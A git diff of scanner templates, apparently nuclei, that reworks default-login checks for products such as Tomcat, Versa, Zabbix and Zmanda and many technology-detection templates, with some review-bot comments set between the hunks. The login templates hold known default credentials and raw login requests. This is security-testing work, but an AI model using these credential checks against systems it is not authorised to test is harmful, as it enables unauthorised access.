@@ -20,12 +14,14 @@ requests: Content-Type: application/x-www-form-urlencoded data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}} + payloads: username: - spadmin password: - admin123 attack: pitchfork + matchers-condition: and matchers: - type: word @@ -34,8 +30,7 @@ requests: - "deleted" part: header condition: and + - type: status status: - 302 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/default/tomcat-default-login.yaml b/poc/default/tomcat-default-login.yaml index 071367c987..4e522c9229 100644 --- a/poc/default/tomcat-default-login.yaml +++ b/poc/default/tomcat-default-login.yaml @@ -2,8 +2,8 @@ id: tomcat-default-login info: name: ApahceTomcat Manager Default Login author: pdteam - description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login @@ -55,11 +55,15 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and - type: status status: - 200 - - type: word - words: - - Apache Tomcat # Enhanced by mp on 2022/03/03 diff --git a/poc/default/versa-default-login-11003.yaml b/poc/default/versa-default-login-11003.yaml index 1dd0c3bf52..88ea1895eb 100644 --- a/poc/default/versa-default-login-11003.yaml +++ b/poc/default/versa-default-login-11003.yaml 
@@ -1,33 +1,35 @@ id: versa-default-login - info: name: Versa Networks SD-WAN Application Default Login author: davidmckennirey severity: high - description: Searches for default admin credentials for the Versa Networks SD-WAN application. + description: Versa Networks SD-WAN application default admin credentials were discovered. tags: default-login,versa,sdwan - + reference: + - https://versa-networks.com/products/sd-wan.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | GET /versa/login.html HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate - - | POST /versa/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&sso=systemRadio - attack: pitchfork payloads: user: - Administrator pass: - versa123 - cookie-reuse: true req-condition: true matchers-condition: and @@ -38,9 +40,10 @@ requests: - "contains(tolower(all_headers_2), 'jsessionid')" - "contains(tolower(all_headers_2), 'location: /versa/index.html')" condition: and - - type: dsl dsl: - "contains(tolower(all_headers_2), '/login?error=true')" - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" - negative: true \ No newline at end of file + negative: true + +# Enhanced by mp on 2022/03/11 diff --git a/poc/default/wifisky-default-password.yaml b/poc/default/wifisky-default-password.yaml index 58c4881478..ece1a116da 100644 --- a/poc/default/wifisky-default-password.yaml +++ b/poc/default/wifisky-default-password.yaml @@ -1,9 +1,11 @@ id: wifisky-default-password + info: name: Wifisky Default Password author: pikpikcu severity: high tags: default-login,wifisky + requests: - raw: - | 
@@ -15,18 +17,22 @@ requests: Connection: close username=admin&password=admin + matchers-condition: and matchers: + - type: word words: - "text/html" part: header + - type: word words: - '"success":"true"' - '"data":' part: body condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/default/wso2-default-login.yaml b/poc/default/wso2-default-login.yaml index 8353ac6595..525f6e9bfd 100644 --- a/poc/default/wso2-default-login.yaml +++ b/poc/default/wso2-default-login.yaml @@ -3,14 +3,7 @@ info: name: WSO2 Management Console Default Login author: cocxanh severity: high - description: WSO2 Management Console default admin credentials were discovered. - reference: - - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console - - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console tags: default-login,wso2 requests: - raw: @@ -34,5 +27,3 @@ requests: - "JSESSIONID" part: header condition: and - -# Enhanced by mp on 2022/04/05 diff --git a/poc/default/zabbix-default-login-11760.yaml b/poc/default/zabbix-default-login-11760.yaml index 15bc04319f..c28c788318 100644 --- a/poc/default/zabbix-default-login-11760.yaml +++ b/poc/default/zabbix-default-login-11760.yaml @@ -3,19 +3,10 @@ id: zabbix-default-login info: name: Zabbix Default Login author: pdteam - severity: high - description: Zabbix default admin credentials were discovered. - reference: - - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + severity: critical tags: zabbix,default-login - metadata: - max-request: 1 -http: +requests: - raw: - | POST /index.php HTTP/1.1 
@@ -42,5 +33,3 @@ http: - type: status status: - 302 - -# Enhanced by mp on 2022/03/13 diff --git a/poc/default/zmanda-default-login-11826.yaml b/poc/default/zmanda-default-login-11826.yaml index 87ba8ff8ee..f8cf00f71f 100644 --- a/poc/default/zmanda-default-login-11826.yaml +++ b/poc/default/zmanda-default-login-11826.yaml @@ -3,14 +3,15 @@ info: name: Zmanda Default Login author: Techryptic (@Tech) severity: high - description: Zmanda default admin credentials admin:admin were discovered. + description: "Zmanda default admin credentials admin:admin were discovered." reference: - https://www.zmanda.com + tags: zmanda,default-login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: zmanda,default-login requests: - raw: - | @@ -35,4 +36,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/04/04 +# Enhanced by mp on 2022/03/13 diff --git a/poc/detect/Biometric-detect.yaml b/poc/detect/Biometric-detect.yaml index 7db4c1a484..002dcf825a 100644 --- a/poc/detect/Biometric-detect.yaml +++ b/poc/detect/Biometric-detect.yaml @@ -4,6 +4,7 @@ info: name: Biometric or Fingerprint detect author: gaurang severity: info + tags: android,file file: - extensions: diff --git a/poc/detect/aem-detection-146.yaml b/poc/detect/aem-detection-146.yaml index 421bb35f54..bb3d7e0753 100644 --- a/poc/detect/aem-detection-146.yaml +++ b/poc/detect/aem-detection-146.yaml @@ -2,9 +2,8 @@ id: aem-detection info: name: Favicon based AEM Detection - severity: info author: shifacyclewala,hackergautam - tags: aem,favicon,tech + severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a @@ -13,6 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe requests: - method: GET 
@@ -25,4 +25,4 @@ requests: matchers: - type: dsl dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/detect/autobahn-python-detect-593.yaml b/poc/detect/autobahn-python-detect-593.yaml index 5697bfc546..3a6054cc5a 100644 --- a/poc/detect/autobahn-python-detect-593.yaml +++ b/poc/detect/autobahn-python-detect-593.yaml @@ -4,12 +4,10 @@ info: name: Autobahn-Python Webserver Detect author: pussycat0x severity: info - metadata: - max-request: 1 - shodan-query: "AutobahnPython" + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 tags: tech,webserver -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -29,5 +27,3 @@ http: part: body regex: - 'AutobahnPython([ 0-9.]+)' - -# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/bedita-detect.yaml b/poc/detect/bedita-detect.yaml index 449784fe63..fe6a5a8a6d 100644 --- a/poc/detect/bedita-detect.yaml +++ b/poc/detect/bedita-detect.yaml @@ -1,25 +1,25 @@ -id: bedita-detect - -info: - name: BEdita detect - author: pikpikcu - severity: info - tags: tech,bedita - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: body - regex: - - 'BEdita(.*)
' - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'target="besite">(.*)
' +id: bedita-detect + +info: + name: BEdita detect + author: pikpikcu + severity: info + tags: tech,bedita + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: body + regex: + - 'BEdita(.*)
' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'target="besite">(.*)
' diff --git a/poc/detect/bigip-config-utility-detect.yaml b/poc/detect/bigip-config-utility-detect.yaml index 4d3c250775..7ca3439c5e 100644 --- a/poc/detect/bigip-config-utility-detect.yaml +++ b/poc/detect/bigip-config-utility-detect.yaml @@ -4,12 +4,16 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + metadata: + max-request: 3 + tags: tech,bigip -requests: +http: - method: GET path: - "{{BaseURL}}/tmui/login.jsp" - "{{BaseURL}}/tmui/tmui/login/welcome.jsp" + matchers: - type: word words: @@ -17,9 +21,11 @@ requests: - "Configuration Utility" condition: and part: body + - method: GET path: - "{{BaseURL}}/mgmt/tm/sys/management-ip" + matchers: - type: word words: @@ -27,7 +33,10 @@ requests: - "Enterprise Manager" condition: and part: header + - type: word words: - "check your user-id and password and try again" - part: body \ No newline at end of file + part: body + +# digest: 4b0a00483046022100f8ef3b159105fe202ca01534cbc95d96b1ee1d9b0797d2b7a69ea786fb069fe3022100e9031155ddc9c9cf28f645d6aa996070c76ba606d138037cccdea4348bdb04ee:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/burp-api-detect.yaml b/poc/detect/burp-api-detect.yaml index d1c703aa98..68a7000ee7 100644 --- a/poc/detect/burp-api-detect.yaml +++ b/poc/detect/burp-api-detect.yaml @@ -4,9 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech + reference: https://portswigger.net/burp/documentation/enterprise/api-reference requests: - method: GET diff --git a/poc/detect/cacti-detect.yaml b/poc/detect/cacti-detect.yaml index 10d928122a..b13f15fcbd 100644 --- a/poc/detect/cacti-detect.yaml +++ b/poc/detect/cacti-detect.yaml @@ -4,7 +4,6 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info - tags: tech,cacti requests: - method: GET 
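Review bot: Removing `tags: burp,tech` leaves burp-api-detect with no tags at all, so a scan that selects templates by tag will skip it without any error, which is a quiet loss of detection coverage. I would keep `tags: burp,tech` under `reference`. The cacti-detect hunk just below, and the citrix-adc-gateway and grafana hunks later in the patch, drop their `tags` line the same way.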
@@ -33,4 +32,4 @@ requests: - type: kval part: header kval: - - Set_Cookie + - Set-Cookie \ No newline at end of file diff --git a/poc/detect/carestream-vue-detect-861.yaml b/poc/detect/carestream-vue-detect-861.yaml index c49c48b023..9e39ae8399 100644 --- a/poc/detect/carestream-vue-detect-861.yaml +++ b/poc/detect/carestream-vue-detect-861.yaml @@ -7,20 +7,17 @@ info: description: This template will detect a running CARESTREAM Vue Motion instance reference: - https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf - metadata: - max-request: 2 tags: tech,myvuehelp -http: +requests: - method: GET path: - "{{BaseURL}}/portal/favicon.ico" - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" - host-redirects: true + redirects: true stop-at-first-match: true max-redirects: 2 - matchers-condition: or matchers: - type: dsl @@ -31,6 +28,4 @@ http: - type: dsl name: "myvuehelp-favicon" dsl: - - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" - -# digest: 4a0a0047304502202aa3815b8f72b57cadb19de2cc86ba80a0a522bc8e65806218ea4f28cc837f7a022100820759ab55360d8f1aad39af864f4baa1f6b2e92dce3a43961f73f7f1c737b53:922c64590222798bb761d5b6d8e72950 + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" \ No newline at end of file diff --git a/poc/detect/chevereto-detect.yaml b/poc/detect/chevereto-detect.yaml index 59ba07f6fa..070a428307 100644 --- a/poc/detect/chevereto-detect.yaml +++ b/poc/detect/chevereto-detect.yaml @@ -4,14 +4,12 @@ info: name: Chevereto detect author: pikpikcu severity: info - metadata: - shodan-query: http.title:"Centreon" tags: tech,chevereto requests: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}/login" matchers-condition: and matchers: @@ -20,10 +18,6 @@ requests: regex: - 'content="Chevereto(.*)">' - - type: status - status: - - 200 - extractors: - type: regex part: body 
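Review bot: The `kval` extractor key in cacti-detect changes from `Set_Cookie` to `Set-Cookie`, but as far as I know nuclei's kval extractor looks header names up with dashes replaced by underscores, so the new spelling should stop returning the cookie value. I would restore `- Set_Cookie`. The `extractors` block opens above this hunk, so its other fields are not visible here.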
diff --git a/poc/detect/citrix-adc-gateway-detect-983.yaml b/poc/detect/citrix-adc-gateway-detect-983.yaml index a542c13028..c8db1fce4c 100644 --- a/poc/detect/citrix-adc-gateway-detect-983.yaml +++ b/poc/detect/citrix-adc-gateway-detect-983.yaml @@ -1,18 +1,16 @@ id: citrix-adc-gateway-panel - info: name: Citrix ADC Gateway detect author: organiccrap severity: info - tags: panel,citrix - requests: - method: GET path: - '{{BaseURL}}/logon/LogonPoint/index.html' - '{{BaseURL}}/logon/LogonPoint/custom.html' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - '_ctxstxt_CitrixCopyright' + - _ctxstxt_CitrixCopyright diff --git a/poc/detect/confluence-detect-1189.yaml b/poc/detect/confluence-detect-1189.yaml index 0e17bc5ab9..4809b79801 100644 --- a/poc/detect/confluence-detect-1189.yaml +++ b/poc/detect/confluence-detect-1189.yaml @@ -1,17 +1,27 @@ id: confluence-detect info: - name: Confluence Detect - author: philippedelteil + name: Confluence Detection + author: philippedelteil,AdamCrosser,6mile severity: info - description: Allows you to detect Atlassian Confluence instances + description: | + This nuclei template is used to detect the presence of Confluence, a popular collaboration software. + classification: + cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian + max-request: 5 + vendor: atlassian + product: confluence_server + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + category: productivity + tags: tech,confluence,atlassian,detect -requests: +http: - method: GET path: + - "{{BaseURL}}/dologin.action" - "{{BaseURL}}" - "{{BaseURL}}/pages" - "{{BaseURL}}/confluence" 
@@ -19,22 +29,25 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' + - type: dsl + dsl: + - contains(to_lower(header), '-confluence-') + - contains(to_lower(body), 'confluence-base-url') extractors: - type: regex - part: body + name: version group: 1 regex: + - '' - 'Atlassian Confluence ([a-z0-9-._]+)' + + - type: regex + name: hostname + group: 1 + regex: + - '' + - '' + - '' +# digest: 4a0a004730450221009bf2f9a3fec8732657aa0e11ec7a7bad6998606a6fdf448adb743732992b14f3022027018043be481632180a2d55600542cba51743a087e2657c16dbd23428ea2382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/contentkeeper-detect.yaml b/poc/detect/contentkeeper-detect.yaml index c7507a5657..b5b6a8daf5 100644 --- a/poc/detect/contentkeeper-detect.yaml +++ b/poc/detect/contentkeeper-detect.yaml @@ -5,8 +5,7 @@ info: author: geeknik severity: info description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning. - reference: - - https://www.contentkeeper.com/ + reference: https://www.contentkeeper.com/ tags: contentkeeper,panel requests: diff --git a/poc/detect/csrfguard-detect-1291.yaml b/poc/detect/csrfguard-detect-1291.yaml index a751a4538e..f3242a8547 100644 --- a/poc/detect/csrfguard-detect-1291.yaml +++ b/poc/detect/csrfguard-detect-1291.yaml 
@@ -1,29 +1,24 @@ id: csrf-guard-detect info: - name: OWASP CSRFGuard 3.x/4.x - Detect + name: OWASP CSRF Guard detection author: forgedhallpass severity: info - description: OWASP CSRFGuard 3.x and 4.x were checked for whether token-per-page support is enabled based on default configuration. - reference: - - https://github.com/OWASP/www-project-csrfguard - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 3 + description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration. + reference: https://github.com/OWASP/www-project-csrfguard tags: tech,csrfguard,owasp -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + - | GET /JavaScriptServlet HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} + - | POST /JavaScriptServlet HTTP/1.1 Host: {{Hostname}} @@ -55,6 +50,7 @@ http: - 'status_code_3==200' - 'contains(body, "{\"pageTokens")' + cookie-reuse: true extractors: - type: regex name: masterToken @@ -73,5 +69,3 @@ http: name: "page-token" json: - '.pageTokens' - -# digest: 4a0a00473045022100be9f0de5a4ed056ec8b1e162a22cd7e372cb88f262008a0f459d95a8b07463c80220102efa4fe89248e28958130257b44a7e4af82ac033f6c447f6c5a99ca5ba299f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/darkstat-detect.yaml b/poc/detect/darkstat-detect.yaml index 630b00c077..89c8d405d8 100644 --- a/poc/detect/darkstat-detect.yaml +++ b/poc/detect/darkstat-detect.yaml @@ -1,5 +1,4 @@ id: darkstat-detect - info: name: Detect Darkstat Reports author: geeknik @@ -7,7 +6,6 @@ info: reference: https://unix4lyfe.org/darkstat/ severity: high tags: darkstat,logs,exposure - requests: - method: GET path: @@ -28,7 +26,6 @@ requests: - "Measuring for" - "hosts" condition: and - extractors: - type: kval part: header diff --git a/poc/detect/dell-idrac6-detect.yaml b/poc/detect/dell-idrac6-detect.yaml index ebca549e38..3a52fd5ad5 100644 
--- a/poc/detect/dell-idrac6-detect.yaml +++ b/poc/detect/dell-idrac6-detect.yaml @@ -2,8 +2,8 @@ id: dell-idrac6-detect info: name: Detect Dell iDRAC6 author: kophjager007 - severity: info description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info tags: tech,dell requests: - method: GET diff --git a/poc/detect/dell-idrac7-detect-6922.yaml b/poc/detect/dell-idrac7-detect-6922.yaml index f11ad8b32e..91cae2e567 100644 --- a/poc/detect/dell-idrac7-detect-6922.yaml +++ b/poc/detect/dell-idrac7-detect-6922.yaml @@ -4,14 +4,11 @@ info: author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info - + tags: tech,dell requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" - matchers-condition: and matchers: - type: status @@ -21,9 +18,8 @@ requests: part: body words: - "12G" - extractors: - type: regex part: body regex: - - '[0-9]{2}G' \ No newline at end of file + - '[0-9]{2}G' diff --git a/poc/detect/detect-dns-over-https.yaml b/poc/detect/detect-dns-over-https.yaml index 65d9a2bf23..8ac33de078 100644 --- a/poc/detect/detect-dns-over-https.yaml +++ b/poc/detect/detect-dns-over-https.yaml @@ -21,11 +21,13 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/dns-message" - part: header + - type: regex + part: header regex: - "(C|c)ontent-(L|l)ength: 49" - part: header diff --git a/poc/detect/detect-drone.yaml b/poc/detect/detect-drone.yaml index 01384c4d0a..8095d264c8 100644 --- a/poc/detect/detect-drone.yaml 
+++ b/poc/detect/detect-drone.yaml @@ -1,17 +1,14 @@ id: detect-drone-config - info: name: Detect Drone Configuration author: geeknik - description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone severity: high + description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone tags: config,exposure,drone - requests: - method: GET path: - "{{BaseURL}}/.drone.yml" - matchers-condition: and matchers: - type: word diff --git a/poc/detect/detect-sentry-6983.yaml b/poc/detect/detect-sentry-6983.yaml index 8acee667d0..b6ab96f47f 100644 --- a/poc/detect/detect-sentry-6983.yaml +++ b/poc/detect/detect-sentry-6983.yaml @@ -1,21 +1,18 @@ id: detect-sentry - info: name: Detect Sentry Instance author: Sicksec severity: info tags: ssrf,sentry,tech - reference: | - - https://hackerone.com/reports/374737 - - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en - + reference: + - https://hackerone.com/reports/374737 + - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+" \ No newline at end of file + - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+" diff --git a/poc/detect/dns-waf-detect-7054.yaml b/poc/detect/dns-waf-detect-7054.yaml index 8e953384fd..bdd9b4b38d 100644 --- a/poc/detect/dns-waf-detect-7054.yaml +++ b/poc/detect/dns-waf-detect-7054.yaml @@ -3,9 +3,6 @@ info: name: DNS WAF Detection author: lu4nx severity: info - description: A DNS WAF was detected. - classification: - cwe-id: CWE-200 tags: tech,waf,dns dns: - name: "{{FQDN}}" @@ -138,5 +135,3 @@ dns: name: edns words: - ".iidns.com" - -# Enhanced by mp on 2022/03/13 diff --git a/poc/detect/elasticsearch-sql-client-detect.yaml b/poc/detect/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 
--- a/poc/detect/elasticsearch-sql-client-detect.yaml +++ b/poc/detect/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/detect/froxlor-detect-7552.yaml b/poc/detect/froxlor-detect-7552.yaml index b3336641ef..cff2ec6735 100644 --- a/poc/detect/froxlor-detect-7552.yaml +++ b/poc/detect/froxlor-detect-7552.yaml @@ -4,16 +4,17 @@ info: name: Froxlor Detect author: pikpikcu severity: info + metadata: + max-request: 1 tags: tech,froxlor -requests: +http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" matchers-condition: and matchers: - - type: word part: body words: @@ -22,3 +23,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100ac246777d3718dd9efcf600fe5399d8797588671770c404df1c8e88b890ebaf502205d3da929451c8d172b413e80495ea002d461934768ea56cc79938db40953e21a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/gitlab-detect.yaml b/poc/detect/gitlab-detect.yaml index 6231806660..816fcf390d 100644 --- a/poc/detect/gitlab-detect.yaml +++ b/poc/detect/gitlab-detect.yaml 
@@ -1,8 +1,10 @@ id: Gitlab-Detect + info: name: Detect Gitlab author: ehsahil severity: info + requests: - method: GET path: diff --git a/poc/detect/grafana-detect.yaml b/poc/detect/grafana-detect.yaml index f50d3e0abe..4f87f7ee36 100644 --- a/poc/detect/grafana-detect.yaml +++ b/poc/detect/grafana-detect.yaml @@ -4,7 +4,6 @@ info: name: Grafana panel detect author: organiccrap severity: info - tags: panel requests: - method: GET @@ -15,9 +14,3 @@ requests: words: - "Grafana" part: body - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Grafana ([v0-9.]+)' diff --git a/poc/detect/graphql-detect.yaml b/poc/detect/graphql-detect.yaml index 1794593fe9..399e476c60 100644 --- a/poc/detect/graphql-detect.yaml +++ b/poc/detect/graphql-detect.yaml @@ -2,7 +2,7 @@ id: graphql-detect info: name: GraphQL API Detection - author: NkxxkN & ELSFA7110 + author: NkxxkN,ELSFA7110 severity: info requests: @@ -30,8 +30,6 @@ requests: - "{{BaseURL}}/graphql-devtools" - "{{BaseURL}}/graphql/v1" - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/lol/graphql" - - "{{BaseURL}}/lol/graphql/v1" - "{{BaseURL}}/api/graphql/v1" - "{{BaseURL}}/portal-graphql" - "{{BaseURL}}/graphql-playground" diff --git a/poc/detect/grav-cms-detect-7842.yaml b/poc/detect/grav-cms-detect-7842.yaml index 168a866015..d9f2c5bde4 100644 --- a/poc/detect/grav-cms-detect-7842.yaml +++ b/poc/detect/grav-cms-detect-7842.yaml @@ -5,17 +5,19 @@ info: author: cyllective severity: info description: Detects Grav CMS + reference: + - https://github.com/getgrav/grav + metadata: + max-request: 1 tags: tech,grav,cms - reference: https://github.com/getgrav/grav -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: or matchers: - - type: word part: header words: 
@@ -24,4 +26,6 @@ requests: - type: word part: body words: - - '' \ No newline at end of file + - '' + +# digest: 4a0a004730450220700f01b8d8cc3f19f9e349fa7d8bc87eb4b0f09ecad8c8f1e37be766e7453cfd022100f4b5bb3e4a84e6ed6b6c28794c87106d3438c342b846f96d096abb9bc3ad60c4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/gunicorn-detect.yaml b/poc/detect/gunicorn-detect.yaml index 420f1af650..0c162e4c4e 100644 --- a/poc/detect/gunicorn-detect.yaml +++ b/poc/detect/gunicorn-detect.yaml @@ -1,22 +1,26 @@ id: gunicorn-detect + info: name: Detect Gunicorn Server author: joanbono - severity: info description: Gunicorn Python WSGI HTTP Server for UNIX - reference: - - https://github.com/benoitc/gunicorn + reference: https://github.com/benoitc/gunicorn + severity: info tags: tech,gunicorn + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: regex part: header regex: - gunicorn+ + extractors: - type: kval part: header diff --git a/poc/detect/itop-detect.yaml b/poc/detect/itop-detect.yaml index daf68e81e2..da91475e93 100644 --- a/poc/detect/itop-detect.yaml +++ b/poc/detect/itop-detect.yaml @@ -1,24 +1,19 @@ id: itop-detect - info: name: iTop Detect author: pikpikcu severity: info tags: tech,itop - requests: - method: GET path: - "{{BaseURL}}/pages/UI.php" - matchers-condition: and matchers: - - type: word part: body words: - "iTop login" - - type: status status: - 200 diff --git a/poc/detect/jaspersoft-detect.yaml b/poc/detect/jaspersoft-detect.yaml index 095c58200f..e38d04792c 100644 --- a/poc/detect/jaspersoft-detect.yaml +++ b/poc/detect/jaspersoft-detect.yaml @@ -3,6 +3,7 @@ info: name: Jaspersoft detected author: koti2 severity: info + tags: tech,jaspersoft requests: - method: GET path: diff --git a/poc/detect/jboss-detect.yaml b/poc/detect/jboss-detect.yaml index 5cfb12fe1d..d70d98fc0e 100644 --- a/poc/detect/jboss-detect.yaml +++ b/poc/detect/jboss-detect.yaml 
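Review bot: The header matcher `gunicorn+` in gunicorn-detect.yaml is unanchored, and its `+` only repeats the final `n`, so it fires on any response header that merely contains the string (a cookie value, a proxied path) rather than on the `Server` banner alone. Anchoring it the way the linkerd templates in this patch anchor `Via` would cut those false positives: `- '(?mi)^server:\s*gunicorn'`. The `extractors` block that follows continues outside the hunk.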
@@ -1,30 +1,22 @@ id: jboss-detect - info: name: JBoss detected - author: daffainfo,idealphase + author: daffainfo severity: info tags: tech,jboss - requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word part: body words: + - "Welcome to JBoss AS" + - "Welcome to JBoss Application Server" - "JBoss EAP 7" - - - type: regex - part: body - regex: - - '<title>Welcome to JBoss(.*)' - - extractors: - - type: regex - group: 1 - part: body - regex: - - '

Welcome to (.+)<\/h1>' + condition: or + - type: status + status: + - 200 diff --git a/poc/detect/jeedom-detect.yaml b/poc/detect/jeedom-detect.yaml index 4154e6b7d0..b7c3ef8645 100644 --- a/poc/detect/jeedom-detect.yaml +++ b/poc/detect/jeedom-detect.yaml @@ -1,24 +1,19 @@ id: jeedom-detect - info: name: Jeedom Detect author: pikpikcu severity: info tags: tech,jeedom - requests: - method: GET path: - "{{BaseURL}}/index.php?v=d" - matchers-condition: and matchers: - - type: word part: body words: - "Jeedom" - - type: status status: - 200 diff --git a/poc/detect/jenkins-detect.yaml b/poc/detect/jenkins-detect.yaml index 136d39862b..2991584dd5 100644 --- a/poc/detect/jenkins-detect.yaml +++ b/poc/detect/jenkins-detect.yaml @@ -1,5 +1,4 @@ id: jenkins-detect - info: name: Jenkins Detection author: philippdelteil,daffainfo,c-sh0 @@ -11,13 +10,11 @@ info: metadata: shodan-query: http.favicon.hash:81586312 tags: tech,jenkins - requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/whoAmI/" - redirects: true max-redirects: 2 stop-at-first-match: true @@ -28,11 +25,9 @@ requests: words: - "x-jenkins" case-insensitive: true - - type: word words: - 